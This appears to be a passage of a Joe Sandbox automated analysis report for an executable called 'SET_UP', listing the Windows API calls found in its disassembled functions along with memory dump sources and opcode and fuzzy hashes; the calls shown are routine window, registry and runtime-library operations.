                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88442daff2d2f7e35d07099bf95e43f3676171bffd4d87cfcb45086ee8b6e045
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2018C32B1022AAADB15DF50E915BFEBB20EB00748F90441FB101661D1C7BC9F44C6AA
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 0041D684
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041D68B
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 0041D69B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                  • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                  • API String ID: 4190356694-3789238822
                                                                                                                                                                                                  • Opcode ID: 8e16ad8e87658a4128ae0511d4945800a0af0042ecb312f16b0c94ecd378ac50
                                                                                                                                                                                                  • Instruction ID: 4920beeff0e8558d0a7a79d320fe063b57acc6ea88f1543854f496f1c1019f55
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e16ad8e87658a4128ae0511d4945800a0af0042ecb312f16b0c94ecd378ac50
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFF0ECB1801348ABE7109FE5CC0DFDB7ABCEB80715F100466EA0993150D77CAA45C76C
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,004BEC22,00000000), ref: 004B979E
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 004B97AC
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000078,?,?,004BEC22,00000000), ref: 004B97CE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                                                  • String ID: GDI32.DLL$SetLayout
                                                                                                                                                                                                  • API String ID: 4275029093-2147214759
                                                                                                                                                                                                  • Opcode ID: b17ccb1998005a001ec8a7e0797776bcdf7e8d5ad228dae999d86cb4b3ff7f58
                                                                                                                                                                                                  • Instruction ID: 4569b327b1de9b253b1bae91d10581cc726eb47ae83be5e5c3fc66d1ce635c3c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b17ccb1998005a001ec8a7e0797776bcdf7e8d5ad228dae999d86cb4b3ff7f58
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BE0D833244200EB83514B6ADC08C5B77D29FC47317298627F625C21E0CB785C01DB3A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(GDI32.DLL,?,004BEC15), ref: 004B9767
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 004B9773
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 004B978B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: AddressErrorHandleLastModuleProc
• String ID: GDI32.DLL$GetLayout
• API String ID: 4275029093-2396518106
• Opcode ID: 10bd6f272b59420d7fda22498ec714549e17f8a456a3c20f072c93fd8e0acfd9
• Instruction ID: 2b666a83fdd3e31ba76ab6a35594e2f9eccc2f9f6d38dc56f7b37313056d606b
• Opcode Fuzzy Hash: 10bd6f272b59420d7fda22498ec714549e17f8a456a3c20f072c93fd8e0acfd9
• Instruction Fuzzy Hash: 44D05B32A90260BBC6901FB6AC4DE5637D89B887A13154677FD75D32F0CF98AC10876D
APIs
  • Part of subcall function 00422D5E: __EH_prolog.LIBCMT ref: 00422D63
  • Part of subcall function 00422D5E: GetWindowsDirectoryW.KERNEL32(00000000,000003FF,00000000), ref: 00422D95
• GetTickCount.KERNEL32 ref: 00420C35
• GetTickCount.KERNEL32 ref: 00420E3C
• GetTickCount.KERNEL32 ref: 00420EB1
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CountTick$DirectoryH_prologWindows
• String ID:
• API String ID: 1252548948-0
• Opcode ID: a6982924a4d9023b55201cfa6eb8c83eede2db5bc81ff7c8274a0d691e883921
• Instruction ID: 028382db0916aa3117959c83e4c65f2066e925ef336d84b980ba15c83567bcca
• Opcode Fuzzy Hash: a6982924a4d9023b55201cfa6eb8c83eede2db5bc81ff7c8274a0d691e883921
• Instruction Fuzzy Hash: BFB10630740714ABDB24DB65E886FAFB7E5EB54710F50491FF102AA2D2DBB9AD80C718
APIs
• GetClientRect.USER32(?,?), ref: 00414F3D
  • Part of subcall function 004C0464: SetBkColor.GDI32(A5A5D47D,?), ref: 004C046E
  • Part of subcall function 004C0464: ExtTextOutW.GDI32(A5A5D47D,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004C0484
• CopyRect.USER32(?,?), ref: 00415185
• InflateRect.USER32(?,000000FF,000000FF), ref: 00415193
• ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?,?), ref: 004151D2
• ImageList_Draw.COMCTL32(?,00000001,?,?,?,00000000), ref: 004151F0
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Rect$DrawImageList_$ClientColorCopyInflateText
• String ID:
• API String ID: 3242326373-0
• Opcode ID: c1edc61998cf68dae7be395935dbadbd6ed438b8068eed510c755826df972806
• Instruction ID: 9fe18e924ecfab3019283369625fd769021ddd88ec5f525f66a4d6a6e59466cb
• Opcode Fuzzy Hash: c1edc61998cf68dae7be395935dbadbd6ed438b8068eed510c755826df972806
• Instruction Fuzzy Hash: 60915A31600B05EFDB24CEA9C984BEAB7F5FB88308F10891AE59697250D774F985CB54
APIs
• CopyRect.USER32(?,?), ref: 004319D4
• ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?), ref: 00431A79
• ImageList_Draw.COMCTL32(?,00000001,?,-00000003,?,00000000), ref: 00431AA1
• CopyRect.USER32(?,?), ref: 00431AB0
• ImageList_Draw.COMCTL32(?,00000003,?,?,?,00000000), ref: 00431B12
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: DrawImageList_$CopyRect
• String ID:
• API String ID: 3723961100-0
• Opcode ID: 555705f4f0c87be4cc8931df0e6d3fcefdcb7f9c41f38f94ceeb931e20afb7c2
• Instruction ID: 67b1a97e49a141fae833425fd5853230c720c4434cce9e144de813f56f1c1e14
• Opcode Fuzzy Hash: 555705f4f0c87be4cc8931df0e6d3fcefdcb7f9c41f38f94ceeb931e20afb7c2
• Instruction Fuzzy Hash: 56713671A01208AFDB14DFA9CD85EAEBBB6FB48700F20902EE505A7264D774AD01CB58
APIs
• __EH_prolog.LIBCMT ref: 00411864
• CopyRect.USER32(?,?), ref: 00411887
  • Part of subcall function 00411B2E: GetBkMode.GDI32(?), ref: 00411B49
  • Part of subcall function 00411B2E: GetBkColor.GDI32(?), ref: 00411B55
  • Part of subcall function 00411B2E: GetTextColor.GDI32(?), ref: 00411B61
  • Part of subcall function 00411B2E: GetParent.USER32(?), ref: 00411B6D
  • Part of subcall function 00411B2E: GetWindowRect.USER32(?,?), ref: 00411B82
  • Part of subcall function 00411B2E: SendMessageW.USER32(?,00000014,?,00000000), ref: 00411BAE
  • Part of subcall function 004B33E0: GetWindowTextLengthW.USER32(?), ref: 004B33ED
  • Part of subcall function 004B33E0: GetWindowTextW.USER32(?,00000000,00000000), ref: 004B3405
• InflateRect.USER32(?,000000FE,00000000), ref: 004118DF
• GetTextColor.GDI32(00000000), ref: 004118F8
  • Part of subcall function 00404B16: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00404B1F
• DrawFocusRect.USER32(00000000,?), ref: 004119DE
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: RectText$ColorWindow$MessageSend$CopyDrawFocusH_prologInflateLengthModeParent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4021768022-0
                                                                                                                                                                                                  • Opcode ID: 909d0920ff87ec7cedde6dcd51d2e474c093357a476379258c636b7346a0de42
                                                                                                                                                                                                  • Instruction ID: 59680d0b653bdf87441a6cc3697c270b77b30e75866dcff9f118049dc8f38c7b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 909d0920ff87ec7cedde6dcd51d2e474c093357a476379258c636b7346a0de42
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75518271A00624DFCF00DFA5C894AEEB7B6FF49310F000529F912AB291CB75AD45CB94
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetStartupInfoA.KERNEL32(?), ref: 0049C724
• GetFileType.KERNEL32(?,?,00000000), ref: 0049C7CF
• GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 0049C832
• GetFileType.KERNEL32(00000000,?,00000000), ref: 0049C840
• SetHandleCount.KERNEL32 ref: 0049C877
Similarity
• API ID: FileHandleType$CountInfoStartup
• String ID:
• API String ID: 1710529072-0
APIs
• __EH_prolog.LIBCMT ref: 00410D74
• GetParent.USER32(?), ref: 00410DB5
• SendMessageW.USER32(?,00000464,00000104,00000000), ref: 00410DDD
• GetParent.USER32(?), ref: 00410E06
• SendMessageW.USER32(?,00000465,00000104,00000000), ref: 00410E23
Similarity
• API ID: MessageParentSend$H_prolog
• String ID:
• API String ID: 1056721960-0
APIs
• __EH_prolog.LIBCMT ref: 004B4E91
• GetTopWindow.USER32(?), ref: 004B4EB8
• GetDlgCtrlID.USER32(00000000), ref: 004B4ECD
• SendMessageW.USER32(?,00000087,00000000,00000000), ref: 004B4F26
• GetWindow.USER32(00000000,00000002), ref: 004B4F61
Similarity
• API ID: Window$CtrlH_prologMessageSend
• String ID:
• API String ID: 4125289812-0
APIs
• __EH_prolog.LIBCMT ref: 004C5CCD
• RegOpenKeyW.ADVAPI32(?,?,?), ref: 004C5CE6
• RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 004C5D0F
• RegDeleteKeyW.ADVAPI32(?,?), ref: 004C5D78
• RegCloseKey.ADVAPI32(?), ref: 004C5D83
Similarity
• API ID: CloseDeleteEnumH_prologOpen
• String ID:
• API String ID: 3131381098-0
APIs
• SetFocus.USER32(00000000,00000000), ref: 004C0CC5
• GetParent.USER32(?), ref: 004C0CD3
• GetActiveWindow.USER32 ref: 004C0D1F
• SendMessageW.USER32(?,00000006,00000001,00000000), ref: 004C0D30
• SendMessageW.USER32(?,00000086,00000001,00000000), ref: 004C0D45
  • Part of subcall function 004B57E9: EnableWindow.USER32(?,?), ref: 004B57F7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSendWindow$ActiveEnableFocusParent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3951091596-0
                                                                                                                                                                                                  • Opcode ID: c9d8f9f3469bf7fde898956c24d19993a4980738e793527dbc377dcc4b2ff6fc
                                                                                                                                                                                                  • Instruction ID: 463bda535b3ab21e5cff519662ba95e28e444c93400d54b2ce82bf0e6d44a165
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9d8f9f3469bf7fde898956c24d19993a4980738e793527dbc377dcc4b2ff6fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B11B179200740DBD7705BA58C84F6BB6E99F54704F144A2EF6879A2E1CB78BC00861C
APIs
  • Part of subcall function 004B5633: GetWindowLongW.USER32(?,000000F0), ref: 004B563F
• SendMessageW.USER32(?,00000086,00000001,00000000), ref: 004C0DB5
• SendMessageW.USER32(?,00000086,00000000,00000000), ref: 004C0DC9
• GetDesktopWindow.USER32 ref: 004C0DCD
• GetWindow.USER32(00000000), ref: 004C0DDA
• SendMessageW.USER32(00000000,0000036D,?,00000000), ref: 004C0DFB
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: MessageSendWindow$DesktopLong
• String ID:
• API String ID: 2272707703-0
• Opcode ID: 61fadce409803e1afb987534fe77f3347fea8d53d8425bef8e819dc3dba2c2c1
• Instruction ID: 7c9253ad19e37ba50a202ae92a2bc77556730cf4f2c06b7e9f351d28a754eb92
• Opcode Fuzzy Hash: 61fadce409803e1afb987534fe77f3347fea8d53d8425bef8e819dc3dba2c2c1
• Instruction Fuzzy Hash: D1118C35340B01F3E7721A55CC06F6FBA49AF41B94F04412EF6421A2D1CF99EC0192AE
APIs
• GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 004C17EA
• GlobalAddAtomW.KERNEL32(?), ref: 004C17F9
• GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 004C180F
• GlobalAddAtomW.KERNEL32(?), ref: 004C1818
• SendMessageW.USER32(?,000003E4,?,?), ref: 004C183C
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: AtomGlobal$Name$MessageSend
• String ID:
• API String ID: 1515195355-0
• Opcode ID: 4c1dc9bd690575041b6d6ca6c67351352d64ea15bd109ebf3aa7cecd83a5fb4c
• Instruction ID: a0796be1959694f25e3f420d8aae7a1f1f63594d6a03ee67edad83632b9d665f
• Opcode Fuzzy Hash: 4c1dc9bd690575041b6d6ca6c67351352d64ea15bd109ebf3aa7cecd83a5fb4c
• Instruction Fuzzy Hash: 3E11A379900318AADB60EB69CC54FEBB3BDEF04700F00855AF56597162E778EE80CB64
APIs
• lstrlenW.KERNEL32(00000000), ref: 0041CE5D
• RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 0041CE76
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 0041CE92
• RegCloseKey.ADVAPI32(?), ref: 0041CEA2
• RegDeleteKeyW.ADVAPI32(?,00000000), ref: 0041CEB0
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CloseDeleteEnumOpenlstrlen
• String ID:
• API String ID: 160701936-0
• Opcode ID: 08bb9cd910a2e0403c5548eb065b3fb3ce7c408ef507596fd72cdb85bf557e4a
• Instruction ID: fec72eb2167a08d9ef5902abc83e6c04dda35b234d6efb831f177485a0ccf9c4
• Opcode Fuzzy Hash: 08bb9cd910a2e0403c5548eb065b3fb3ce7c408ef507596fd72cdb85bf557e4a
• Instruction Fuzzy Hash: B0015632150214BAEB216F23EC4DEDB3F6CEF91751F108036F81999191EB759942C6AC
APIs
• PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 004C090D
• PostMessageW.USER32(?,00000367,00000000,00000000), ref: 004C0923
• GetCapture.USER32 ref: 004C0925
• ReleaseCapture.USER32 ref: 004C0930
• PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 004C094D
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Message$CapturePost$PeekRelease
• String ID:
• API String ID: 1125932295-0
• Opcode ID: eb9470a3fcd4891bba1e541f97852db2b0f8aa8aa42ac36aafec1163a5b5647f
• Instruction ID: 52065f0c73146e226af49c9f6bd28d898a39446346474a50d6bf028ca8db87e0
• Opcode Fuzzy Hash: eb9470a3fcd4891bba1e541f97852db2b0f8aa8aa42ac36aafec1163a5b5647f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAF0F430600708BFD6306F26EC48E177FBCFB81748B41062EF14242611D736E5018A38
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000103,7FFFFFFF,0049AC26,0049AB49,00000000,?,?,00000000,00000001), ref: 0049C8EB
                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0049C8F9
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0049C945
                                                                                                                                                                                                    • Part of subcall function 00499EC2: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0049C90E,00000001,00000074,?,?,00000000,00000001), ref: 00499FB8
                                                                                                                                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 0049C91D
                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0049C92E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2020098873-0
                                                                                                                                                                                                  • Opcode ID: 728b2e406d9662b3daca5c713c27d1c6331d9942989162d037ea912c5b7fd59a
                                                                                                                                                                                                  • Instruction ID: 02134c09d96806edb1ce9383c971cebc2a5d1ceeafcdf693ea1ec644ca7c71ce
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 728b2e406d9662b3daca5c713c27d1c6331d9942989162d037ea912c5b7fd59a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93F09631501721ABDB212B25AC09B2B3F54EF00775710063AF941962F1DB6888019A99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 004C4399
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000021), ref: 004C43B2
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000005), ref: 004C43C6
                                                                                                                                                                                                  • InflateRect.USER32(?,00000000), ref: 004C43CD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
